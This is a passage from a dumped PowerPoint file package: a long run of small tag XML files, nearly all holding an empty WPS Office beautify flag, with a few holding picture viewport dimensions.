</file>

<file path=ppt/tags/tag481.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag482.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag483.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag484.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag485.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag486.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag487.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag488.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag489.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag49.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag490.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag491.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag492.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag493.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag494.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag495.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag496.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag497.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag498.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag499.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag50.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag500.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag501.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag502.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag503.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag504.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag505.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag506.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag507.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag508.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag509.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag51.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag510.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag511.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag512.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag513.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag514.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag515.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag516.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag517.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag518.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag519.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag52.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag520.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag521.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag522.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag523.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag524.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag525.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag526.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag527.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag528.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag529.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag53.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag530.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag531.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag532.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag533.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag534.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag535.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag536.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag537.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag538.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag539.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag54.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag540.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag541.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag542.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag543.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag544.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag545.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag546.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag547.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag548.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag549.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag55.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag550.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag551.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag552.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag553.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag554.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag555.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag556.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag557.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag558.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag559.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag56.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag560.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag561.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag562.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag563.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag564.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag565.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag566.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag567.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag568.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag569.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag57.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag570.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag571.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag572.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag573.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag574.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag575.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag576.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag577.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag578.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag579.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag58.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag580.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag581.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag582.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag583.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag584.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag585.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
